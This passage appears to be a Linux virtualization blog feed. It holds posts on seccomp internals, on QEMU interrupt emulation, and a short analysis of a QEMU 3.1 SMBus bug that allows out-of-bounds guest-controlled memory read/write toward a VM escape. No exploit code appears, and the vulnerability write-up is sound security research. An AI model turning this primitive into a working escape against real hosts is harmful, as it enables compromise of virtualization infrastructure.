}
</code></pre></div></div>
<p>Following is the result. The result show our conclusion.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# time ./test1 1
real 0m0.539s
user 0m0.195s
sys 0m0.343s
root@ubuntu:~# time ./test1 3
real 0m0.172s
user 0m0.080s
sys 0m0.092s
root@ubuntu:~# time ./test1 2
real 0m0.002s
user 0m0.000s
sys 0m0.002s
</code></pre></div></div>
Anatomy of the seccomp2019-02-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/04/seccomp
<h3> Introduction </h3>
<p>Linux kernel expose a lot of system calls to the userland process, however not all them will be used in one process. In most of the cases, one process only uses a very limited system calls and leave a lot of the other system calls unused. It is harmful to let one process to call any system calls. For example if one system call(the process don’t use in normal execution) is implemented with a security issue, the process can easily trigger this. Also if one process was compromised, the attacker usually will run a piece of shellcode and this may trigger the system calls that the process will not trigger in normal execution(such as execve). So reduce the system calls that one process can make is useful.</p>
<p>Seccomp filtering is such a mechism to specify a filter for process’s incoming system calls. Seccomp was originated from Secure Computing. At first, there are only a strict seccomp mode. This means once the process is set to the strict mode, it can only call the ‘read’, ‘write’, ‘_exit’ and ‘sigreturn’ system calls. Of course this is not flexible and not very useful. Later the seccomp adds a filter mode. The process can set the seccomp policy to filter mode and add a new filter program to the kernel. This filter program is Berkeley Packet Filter(BPF) program, as with socket filters, except that the data operated on is related to system call being made: system call number and the system call arguments. With BPF program added to the kernel, the process can easily make his policy to filter the system calls, let the kernel reject a system call or send a SIGSYS signal to the process. Note that BFP program can’t deference pointers so the seccomp can just evaluates the system call arguments directly.</p>
<h3> Framework </h3>
<p>The idea behind seccomp is very simple. Following picture show it. First, the process should set the seccomp policy to strict or filter mode. This will cause the kernel set the seccomp flag in task_struct and if the process sets the filter mode, the kernel will add the program to a seccomp filter list in task_struct. Later for every system call the process made, the kernel will check that based the seccomp filter.</p>
<p><img src="/assets/img/seccomp/1.png" alt="" /></p>
<h3> Usage </h3>
<p>Following code shows the strict seccomp mode usage. In default, the process doesn’t enable seccomp means it can call any system call. After set it to strict mode, it can only can the four system call so even the prctl itself can’t be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <unistd.h>
int main() {
int ret;
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);
ret = prctl(PR_GET_SECCOMP);
printf("you should not see me!\n");
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./prctl
no seccomp enabled!
Killed
</code></pre></div></div>
<p>Following code shows the filter mode usage. The BPF program instruction spec can be found <a href="https://man.openbsd.org/bpf">here</a>。The BPF program here just allow the prctl and write system call. Also note that we need call prctl(PR_SET_NO_NEW_PRIVS) to make sure the current process and its child process can’t be granted new privilegs(for eaxmple, running a setuid binary)。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <unistd.h>
#include <linux/filter.h>
#include <stddef.h>
#include <sys/syscall.h>
int main() {
int ret;
struct sock_filter filter[] = {
BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr))),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_prctl, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_write, 0, 1),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
.filter = filter,
};
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled!\n");
}
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
perror("prctl(NO_NEW_PRIVS)");
exit(1);
}
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) {
perror("prctl(SECCOMP)");
exit(1);
}
ret = prctl(PR_GET_SECCOMP);
if (ret == 0) {
printf("no seccomp enabled!\n");
}
else {
printf("seccomp enabled = %d!\n", ret);
}
dup2(1,2);
printf("you should not see me!\n");
return 0;
}
</code></pre></div></div>
<p>Following is the result.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ./filter
no seccomp enabled!
seccomp enabled = 2!
Bad system call (core dumped)
</code></pre></div></div>
<h3> Kernel implementation </h3>
<p>We can use prctl to get/set seccomp policy. Also the new seccomp system call be used to set seccomp policy. The implementation of prctl system call is in kernel/sys.c file. Function ‘prctl_set_seccomp’ is called when the first argument of prctl is PR_SET_SECCOMP, following shows the code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> long prctl_set_seccomp(unsigned long seccomp_mode, char __user *filter)
{
unsigned int op;
char __user *uargs;
switch (seccomp_mode) {
case SECCOMP_MODE_STRICT:
op = SECCOMP_SET_MODE_STRICT;
/*
* Setting strict mode through prctl always ignored filter,
* so make sure it is always NULL here to pass the internal
* check in do_seccomp().
*/
uargs = NULL;
break;
case SECCOMP_MODE_FILTER:
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}
/* prctl interface doesn't have flags, so they are always zero. */
return do_seccomp(op, 0, uargs);
}
</code></pre></div></div>
<p>Set the ‘op’ according the seccomp mode and call do_seccomp.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long do_seccomp(unsigned int op, unsigned int flags,
const char __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT:
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER:
return seccomp_set_mode_filter(flags, uargs);
default:
return -EINVAL;
}
}
</code></pre></div></div>
<p>Call ‘seccomp_set_mode_strict’ directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long seccomp_set_mode_strict(void)
{
const unsigned long seccomp_mode = SECCOMP_MODE_STRICT;
long ret = -EINVAL;
spin_lock_irq(&current->sighand->siglock);
if (!seccomp_may_assign_mode(seccomp_mode))
goto out;
#ifdef TIF_NOTSC
disable_TSC();
#endif
seccomp_assign_mode(current, seccomp_mode, 0);
ret = 0;
out:
spin_unlock_irq(&current->sighand->siglock);
return ret;
}
</code></pre></div></div>
<p>“seccomp_may_assign_mode” is used to make sure the seccomp has not been set and if it is set and it’s previous value is not the same as SECCOMP_MODE_STRICT, it return false. So here we can see, once we set the seccomp we can’t change it. The state of a seccomp’ed process is stored in ‘seccomp’ filed in task_struct. The definition of ‘seccomp’ is following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct seccomp {
int mode;
struct seccomp_filter *filter;
};
struct seccomp_filter {
atomic_t usage;
struct seccomp_filter *prev;
struct bpf_prog *prog;
};
</code></pre></div></div>
<p>The ‘mode’ field indicates the seccomp mode and the ‘filter’ is used to link all of the filter in seccomp filter mode.
Once the check of ‘seccomp_may_assign_mode’ passed, ‘seccomp_set_mode_strict’ calls ‘seccomp_assign_mode’ to set seccomp mode. It just set ‘task->seccomp.mode’ and set ‘task_struct->thread_info->flags’ with ‘TIF_SECCOMP’.
If the ‘op’ of ‘do_seccomp’s argument is ‘SECCOMP_SET_MODE_FILTER’, this means the userland want to set seccomp mode to filter. The ‘do_seccomp’ calls ‘seccomp_set_mode_filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
/* Validate flags. */
if (flags & ~SECCOMP_FILTER_FLAG_MASK)
return -EINVAL;
/* Prepare the new filter before holding any locks. */
prepared = seccomp_prepare_user_filter(filter);
if (IS_ERR(prepared))
return PTR_ERR(prepared);
/*
* Make sure we cannot change seccomp or nnp state via TSYNC
* while another thread is in the middle of calling exec.
*/
if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_free;
spin_lock_irq(&current->sighand->siglock);
if (!seccomp_may_assign_mode(seccomp_mode))
goto out;
ret = seccomp_attach_filter(flags, prepared);
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;
seccomp_assign_mode(current, seccomp_mode, flags);
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_free:
seccomp_filter_free(prepared);
return ret;
}
</code></pre></div></div>
<p>‘seccomp_prepare_user_filter’ is used to prepare the new filter. It mainly calls ‘seccomp_prepare_filter’. ‘seccomp_prepare_filter’ check the argument userland provided. Then do a permission check, as the comments says it only allow process ‘CAP_SYS_ADMIN in its namespace or be running with no_new_privs’ to set seccomp to filter mode.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
struct seccomp_filter *sfilter;
int ret;
const bool save_orig = config_enabled(CONFIG_CHECKPOINT_RESTORE);
if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
return ERR_PTR(-EINVAL);
BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));
/*
* Installing a seccomp filter requires that the task has
* CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
* This avoids scenarios where unprivileged tasks can affect the
* behavior of privileged children.
*/
if (!task_no_new_privs(current) &&
security_capable_noaudit(current_cred(), current_user_ns(),
CAP_SYS_ADMIN) != 0)
return ERR_PTR(-EACCES);
/* Allocate a new seccomp_filter */
sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
if (!sfilter)
return ERR_PTR(-ENOMEM);
ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
seccomp_check_filter, save_orig);
if (ret < 0) {
kfree(sfilter);
return ERR_PTR(ret);
}
atomic_set(&sfilter->usage, 1);
return sfilter;
}
</code></pre></div></div>
<p>Then ‘seccomp_prepare_filter’ calls ‘bpf_prog_create_from_user’ to copy the filter program from userland to kernel and also make a sanity check.
After prepare a filter, the ‘seccomp_set_mode_filter’ calls ‘seccomp_attach_filter’ to attach this filter to process. It is simply link this new filter to ‘task_struct->seccomp.filter’ lists. Finally set the ‘task_struct->seccomp.mode’ to SECCOMP_MODE_FILTER and set ‘task_struct->thread_info->flags’ with ‘TIF_SECCOMP’.</p>
<p>When the process set seccomp mode, what system call it can make is stricted or filtered. In the system call enter, it checks ‘_TIF_WORK_SYSCALL_ENTRY’(arch\x86\entry\entry_64.S) and if it is not 0, it means it should do something before dispatch the system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _TIF_WORK_SYSCALL_ENTRY \
(_TIF_SYSCALL_TRACE | _TIF_SYSCALL_EMU | _TIF_SYSCALL_AUDIT | \
_TIF_SECCOMP | _TIF_SINGLESTEP | _TIF_SYSCALL_TRACEPOINT | \
_TIF_NOHZ)
</code></pre></div></div>
<p>Here we can see ‘_TIF_SECCOMP ‘ if part of ‘_TIF_WORK_SYSCALL_ENTRY’. First it calls ‘syscall_trace_enter_phase1’. In that function it calls ‘seccomp_phase1’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u32 seccomp_phase1(struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall = sd ? sd->nr :
syscall_get_nr(current, task_pt_regs(current));
if (config_enabled(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return SECCOMP_PHASE1_OK;
switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return SECCOMP_PHASE1_OK;
#ifdef CONFIG_SECCOMP_FILTER
case SECCOMP_MODE_FILTER:
return __seccomp_phase1_filter(this_syscall, sd);
#endif
default:
BUG();
}
}
</code></pre></div></div>
<p>For strict mode it calls ‘__secure_computing_strict’. It compare ‘this_syscall’ with the four allowed system call and do_exit with SIGKILL if current syscall is not one of them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __secure_computing_strict(int this_syscall)
{
int *syscall_whitelist = mode1_syscalls;
#ifdef CONFIG_COMPAT
if (is_compat_task())
syscall_whitelist = mode1_syscalls_32;
#endif
do {
if (*syscall_whitelist == this_syscall)
return;
} while (*++syscall_whitelist);
#ifdef SECCOMP_DEBUG
dump_stack();
#endif
audit_seccomp(this_syscall, SIGKILL, SECCOMP_RET_KILL);
do_exit(SIGKILL);
}
static int mode1_syscalls_32[] = {
__NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
0, /* null terminated */
};
</code></pre></div></div>
<p>For filter mode, it calls ‘__seccomp_phase1_filter’ to run the filter in ‘task_struct->seccomp.filter’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static u32 __seccomp_phase1_filter(int this_syscall, struct seccomp_data *sd)
{
u32 filter_ret, action;
int data;
/*
* Make sure that any changes to mode from another thread have
* been seen after TIF_SECCOMP was seen.
*/
rmb();
filter_ret = seccomp_run_filters(sd);
data = filter_ret & SECCOMP_RET_DATA;
action = filter_ret & SECCOMP_RET_ACTION;
switch (action) {
case SECCOMP_RET_ERRNO:
/* Set low-order bits as an errno, capped at MAX_ERRNO. */
if (data > MAX_ERRNO)
data = MAX_ERRNO;
syscall_set_return_value(current, task_pt_regs(current),
-data, 0);
goto skip;
case SECCOMP_RET_TRAP:
/* Show the handler the original registers. */
syscall_rollback(current, task_pt_regs(current));
/* Let the filter pass back 16 bits of data. */
seccomp_send_sigsys(this_syscall, data);
goto skip;
case SECCOMP_RET_TRACE:
return filter_ret; /* Save the rest for phase 2. */
case SECCOMP_RET_ALLOW:
return SECCOMP_PHASE1_OK;
case SECCOMP_RET_KILL:
default:
audit_seccomp(this_syscall, SIGSYS, action);
do_exit(SIGSYS);
}
unreachable();
skip:
audit_seccomp(this_syscall, 0, action);
return SECCOMP_PHASE1_SKIP;
}
</code></pre></div></div>
<p>Notice here only ‘SECCOMP_RET_TRACE’ will cause the ‘syscall_trace_enter_phase2’ be called in entry_64.S. If the ‘return’ is ‘SECCOMP_RET_KILL’ it will cause the process exit with SIGSYS signal.</p>
make QEMU VM escape great again2018-12-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/12/06/qemu-escape
<p>The QEMU 3.1 introduced a very serious security issue in
SMBus implementation.</p>
<p>The corresponding commit is following:</p>
<p><a href="https://git.qemu.org/?p=qemu.git;a=commitdiff;h=38ad4fae43b9c57a4ef3111217b110b25dbd3c50;hp=00bdfeab1584e68bad76034e4ffc33595533fe7d">i2c: pm_smbus: Add block transfer capability</a></p>
<p>And the fix is in <a href="https://git.qemu.org/?p=qemu.git;a=commit;h=f2609ffdf39bcd4f89b5f67b33347490023a7a84">i2c: pm_smbus: check smb_index before block transfer write</a></p>
<p>The issue is the processing of SMBHSTSTS command in smb_ioport_writeb() function.</p>
<p>Here we see the s->smb_index is increased without bounding check.
The read is from ‘s->smb_addr’ and can be controlled by SMBHSTADD command. So it is easy
to bypass the if (!read…). As the ‘s->smb_index’ is a ‘uint_32’, this means we can add it
to 0xffffffff theoretically. This ‘s->smb_index’ is used to index the memory in ‘s->smb_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>case SMBHSTSTS:
s->smb_stat &= ~(val & ~STS_HOST_BUSY);
if (!s->op_done && !(s->smb_auxctl & AUX_BLK)) {
uint8_t read = s->smb_addr & 0x01;
s->smb_index++;
if (!read && s->smb_index == s->smb_data0) {
uint8_t prot = (s->smb_ctl >> 2) & 0x07;
uint8_t cmd = s->smb_cmd;
uint8_t addr = s->smb_addr >> 1;
int ret;
if (prot == PROT_I2C_BLOCK_READ) {
s->smb_stat |= STS_DEV_ERR;
goto out;
}
ret = smbus_write_block(s->smbus, addr, cmd, s->smb_data,
s->smb_data0, !s->i2c_enable);
if (ret < 0) {
s->smb_stat |= STS_DEV_ERR;
goto out;
}
s->op_done = true;
s->smb_stat |= STS_INTR;
s->smb_stat &= ~STS_HOST_BUSY;
} else if (!read) {
s->smb_data[s->smb_index] = s->smb_blkdata;
s->smb_stat |= STS_BYTE_DONE;
} else if (s->smb_ctl & CTL_LAST_BYTE) {
s->op_done = true;
s->smb_blkdata = s->smb_data[s->smb_index];
s->smb_index = 0;
s->smb_stat |= STS_INTR;
s->smb_stat &= ~STS_HOST_BUSY;
} else {
s->smb_blkdata = s->smb_data[s->smb_index];
s->smb_stat |= STS_BYTE_DONE;
}
}
break;
</code></pre></div></div>
<p>Look at this code snippet more, there are three ‘else’ after the ‘s->smb_index’ increased.
The next important data appears ‘s->smb_blkdata’. This data can be assign by write and write
using ‘SMBBLKDAT’ command. In the first ‘else’ we can assign ‘s->smb_data[s->smb_index]’ with ‘s->smb_blkdata’, this means we can write arbitrary bytes out of ‘s->smb_data’ array.
In the second and last ‘else’, the ‘s->smb_data[s->smb_index]’ is assigned to ‘s->smb_blkdata’,
this means we can read bytes out of ‘s->smb_data’ array.</p>
<p>So we can read/write a lot of (4G theoretically) memory after ‘s->smb_data’ array. This gives us
a lot of power and room to make exploit.</p>
<p>Following is the demo of VM escape.</p>
<p><img src="/assets/img/qemues/1.jpg" alt="" /></p>
QEMU interrupt emulation2018-09-06T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/06/qemu-interrupt-emulation
<p>I have written a blog about kvm interrupt emulation. As we know, the QEMU can emulation the whole system, in this blog, I will disscuss how the QEMU emulate the interrupt chip of a virtual machine. In this blog, we assume that all of the irqchip is emulated in QEMU, set the qemu command line with ‘-machine kernel-irqchip=off’ can achive this.</p>
<h3> Interrupt controller initialization </h3>
<p>The function ‘pc_init1’ first allocates the ‘pcms->gsi’ to represent the interrupt delivery start point.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pcms->gsi = qemu_allocate_irqs(gsi_handler, gsi_state, GSI_NUM_PINS);
qemu_irq *qemu_allocate_irqs(qemu_irq_handler handler, void *opaque, int n)
{
return qemu_extend_irqs(NULL, 0, handler, opaque, n);
}
qemu_irq *qemu_extend_irqs(qemu_irq *old, int n_old, qemu_irq_handler handler,
void *opaque, int n)
{
qemu_irq *s;
int i;
if (!old) {
n_old = 0;
}
s = old ? g_renew(qemu_irq, old, n + n_old) : g_new(qemu_irq, n);
for (i = n_old; i < n + n_old; i++) {
s[i] = qemu_allocate_irq(handler, opaque, i);
}
return s;
}
</code></pre></div></div>
<p>This function allocates 24 ‘qemu_irq’ struct and the handler is set to ‘gsi_handler’. Here ‘gsi’ is the abbreviation of ‘global system interrupts’.</p>
<p>Later, in ‘i440fx_init’, this ‘gsi’ is assigned to ‘piix3->pic’, it also calls ‘pci_bus_irqs’ to set the pci bus’s ‘set_irq’ and ‘get_irq’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pci_bus_irqs(b, piix3_set_irq, pci_slot_get_pirq, piix3,
PIIX_NUM_PIRQS);
</code></pre></div></div>
<p>‘piix3_set_irq’ function finally calls ‘piix3_\set_irq_pic’, which we can see calls the ‘piix3->pic’ which is the ‘gsi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
qemu_set_irq(piix3->pic[pic_irq],
!!(piix3->pic_levels &
(((1ULL << PIIX_NUM_PIRQS) - 1) <<
(pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
<p>Return to ‘pc_init1’, it calls ‘isa_bus_irqs’, this function set the ISA bus’s irqs to ‘gsi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> isa_bus_irqs(isa_bus, pcms->gsi);
</code></pre></div></div>
<p>As we emulate irqchip in QEMU, it calls ‘i8259_init’, it first calls ‘pc_allocate_cpu_irq’ to allocate a parent_irq. ‘pic_irq_request’ is used as this irq’s handler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (kvm_pic_in_kernel()) {
i8259 = kvm_i8259_init(isa_bus);
} else if (xen_enabled()) {
i8259 = xen_interrupt_controller_init();
} else {
i8259 = i8259_init(isa_bus, pc_allocate_cpu_irq());
}
qemu_irq pc_allocate_cpu_irq(void)
{
return qemu_allocate_irq(pic_irq_request, NULL, 0);
}
</code></pre></div></div>
<p>In order to understand function ‘i8259_init’, we need first to look at the i8259 realize function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_realize(DeviceState *dev, Error **errp)
{
PICCommonState *s = PIC_COMMON(dev);
PICClass *pc = PIC_GET_CLASS(dev);
memory_region_init_io(&s->base_io, OBJECT(s), &pic_base_ioport_ops, s,
"pic", 2);
memory_region_init_io(&s->elcr_io, OBJECT(s), &pic_elcr_ioport_ops, s,
"elcr", 1);
qdev_init_gpio_out(dev, s->int_out, ARRAY_SIZE(s->int_out));
qdev_init_gpio_in(dev, pic_set_irq, 8);
pc->parent_realize(dev, errp);
}
</code></pre></div></div>
<p>In ‘pic_realize’ function, the most import function is ‘qdev_init_gpio_out’ and ‘qdev_init_gpio_in’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void qdev_init_gpio_out(DeviceState *dev, qemu_irq *pins, int n)
{
qdev_init_gpio_out_named(dev, pins, NULL, n);
}
void qdev_init_gpio_out_named(DeviceState *dev, qemu_irq *pins,
const char *name, int n)
{
int i;
NamedGPIOList *gpio_list = qdev_get_named_gpio_list(dev, name);
assert(gpio_list->num_in == 0 || !name);
if (!name) {
name = "unnamed-gpio-out";
}
memset(pins, 0, sizeof(*pins) * n);
for (i = 0; i < n; ++i) {
gchar *propname = g_strdup_printf("%s[%u]", name,
gpio_list->num_out + i);
object_property_add_link(OBJECT(dev), propname, TYPE_IRQ,
(Object **)&pins[i],
object_property_allow_set_link,
OBJ_PROP_LINK_UNREF_ON_RELEASE,
&error_abort);
g_free(propname);
}
gpio_list->num_out += n;
}
</code></pre></div></div>
<p>‘qdev_init_gpio_out’ function add a link property named ‘unamed-gpio-out[0]’ and set the link *child to ‘address of ‘s->int_out’. Likely , ‘qdev_init_gpio_in’ adds 8 ‘unamed-gpio-in[0]’ link property.</p>
<p>Return back function ‘i8259_init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> qemu_irq *i8259_init(ISABus *bus, qemu_irq parent_irq)
{
qemu_irq *irq_set;
DeviceState *dev;
ISADevice *isadev;
int i;
irq_set = g_new0(qemu_irq, ISA_NUM_IRQS);
isadev = i8259_init_chip(TYPE_I8259, bus, true);
dev = DEVICE(isadev);
qdev_connect_gpio_out(dev, 0, parent_irq);
for (i = 0 ; i < 8; i++) {
irq_set[i] = qdev_get_gpio_in(dev, i);
}
isa_pic = dev;
isadev = i8259_init_chip(TYPE_I8259, bus, false);
dev = DEVICE(isadev);
qdev_connect_gpio_out(dev, 0, irq_set[2]);
for (i = 0 ; i < 8; i++) {
irq_set[i + 8] = qdev_get_gpio_in(dev, i);
}
slave_pic = PIC_COMMON(dev);
return irq_set;
}
</code></pre></div></div>
<p>First create the master pic and set the output pin (‘s->int_out’) to the ‘parent_irq’, this is done through function ‘qdev_connect_gpio_out_named’ which set the ‘unamed-gpio-out[0]’ link property. Then create the slave pic and set its out pin to the master’s second in pin. Finally return the ‘irq_set’, this is all of the pic’s ‘qemu_irq’.</p>
<p>Then these ‘qemu_irq’ is assigned to ‘gsi_state’ and calls ‘ioapic_init_gsi’ to initialize the IOAPIC.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void ioapic_init_gsi(GSIState *gsi_state, const char *parent_name)
{
DeviceState *dev;
SysBusDevice *d;
unsigned int i;
if (kvm_ioapic_in_kernel()) {
dev = qdev_create(NULL, "kvm-ioapic");
} else {
dev = qdev_create(NULL, "ioapic");
}
if (parent_name) {
object_property_add_child(object_resolve_path(parent_name, NULL),
"ioapic", OBJECT(dev), NULL);
}
qdev_init_nofail(dev);
d = SYS_BUS_DEVICE(dev);
sysbus_mmio_map(d, 0, IO_APIC_DEFAULT_ADDRESS);
for (i = 0; i < IOAPIC_NUM_PINS; i++) {
gsi_state->ioapic_irq[i] = qdev_get_gpio_in(dev, i);
}
}
</code></pre></div></div>
<p>Here create the ioapic device and set the ‘gsi_state->ioapic_irq’ with the ioapic’s ‘qemu_irq’. The later is created in the realize of ioapic device. The handler is ‘ioapic_set_irq’.</p>
<h3> Interrupt delivery </h3>
<p>Let’s take a PCI device’s interrupt delivery as an example. The PCI device can call ‘pci_set_irq’ to issue an interrupt to the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void pci_set_irq(PCIDevice *pci_dev, int level)
{
int intx = pci_intx(pci_dev);
pci_irq_handler(pci_dev, intx, level);
}
static inline int pci_intx(PCIDevice *pci_dev)
{
return pci_get_byte(pci_dev->config + PCI_INTERRUPT_PIN) - 1;
}
static void pci_irq_handler(void *opaque, int irq_num, int level)
{
PCIDevice *pci_dev = opaque;
int change;
change = level - pci_irq_state(pci_dev, irq_num);
if (!change)
return;
pci_set_irq_state(pci_dev, irq_num, level);
pci_update_irq_status(pci_dev);
if (pci_irq_disabled(pci_dev))
return;
pci_change_irq_level(pci_dev, irq_num, change);
}
static void pci_change_irq_level(PCIDevice *pci_dev, int irq_num, int change)
{
PCIBus *bus;
for (;;) {
bus = pci_get_bus(pci_dev);
irq_num = bus->map_irq(pci_dev, irq_num);
if (bus->set_irq)
break;
pci_dev = bus->parent_dev;
}
bus->irq_count[irq_num] += change;
bus->set_irq(bus->irq_opaque, irq_num, bus->irq_count[irq_num] != 0);
}
</code></pre></div></div>
<p>There are a little PCI-specific knowledge I will not discuss just focus the interrupt instead.
In the last function ‘pci_change_irq_level’, it calls the PCI bus’ ‘map_irq’ to get the irq number and then call ‘set_irq’ which as we know is ‘piix3_set_irq’. This function calls ‘piix3_set_irq_pic’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
qemu_set_irq(piix3->pic[pic_irq],
!!(piix3->pic_levels &
(((1ULL << PIIX_NUM_PIRQS) - 1) <<
(pic_irq * PIIX_NUM_PIRQS))));
}
</code></pre></div></div>
<p>The piix3->pic is the gsi and the handler is ‘gsi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void gsi_handler(void *opaque, int n, int level)
{
GSIState *s = opaque;
DPRINTF("pc: %s GSI %d\n", level ? "raising" : "lowering", n);
if (n < ISA_NUM_IRQS) {
qemu_set_irq(s->i8259_irq[n], level);
}
qemu_set_irq(s->ioapic_irq[n], level);
}
</code></pre></div></div>
<p>Choose the interrupt controller according the irq number and aclls the corresponding handler. Take ioapic_irq as for example, the handler is ‘ioapic_set_irq’. In this function it calls ‘ioapic_service’ to delivery interrupt to the LAPIC. This is through ‘stl_le_phys’, this will cause the apic’s MMIO write function being called, which is ‘apic_mem_writel’. APIC can call ‘apic_update_irq’ to process interrupt. THen ‘cpu_interrupt’ and finally ‘kvm_handle_interrupt’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_handle_interrupt(CPUState *cpu, int mask)
{
cpu->interrupt_request |= mask;
if (!qemu_cpu_is_self(cpu)) {
qemu_cpu_kick(cpu);
}
}
</code></pre></div></div>
<p>Here set the ‘cpu->interrupt_request’ then in the next enter the guest, the QEMU will call ioctl with ‘KVM_INTERRUPT’ ioctl to inject the interrupt to the guest.</p>
<p>Let’s see a backtrack of interrupt delivery to make a more deep impression.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 apic_mem_write (opaque=0x61600000a280, addr=16388, val=33, size=4)
at /home/test/qemu/hw/intc/apic.c:756
#1 0x000055ce1f7241fd in memory_region_write_accessor (mr=0x61600000a300,
addr=16388, value=0x7f329b8f8188, size=4, shift=0, mask=4294967295,
attrs=...) at /home/test/qemu/memory.c:526
#2 0x000055ce1f7244d6 in access_with_adjusted_size (addr=16388,
value=0x7f329b8f8188, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f72404f <memory_region_write_accessor>,
mr=0x61600000a300, attrs=...) at /home/test/qemu/memory.c:593
#3 0x000055ce1f72b2cc in memory_region_dispatch_write (mr=0x61600000a300,
addr=16388, data=33, size=4, attrs=...) at /home/test/qemu/memory.c:1473
#4 0x000055ce1f65021b in address_space_stl_internal (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0, endian=DEVICE_LITTLE_ENDIAN)
at /home/test/qemu/memory_ldst.inc.c:349
#5 0x000055ce1f65047f in address_space_stl_le (
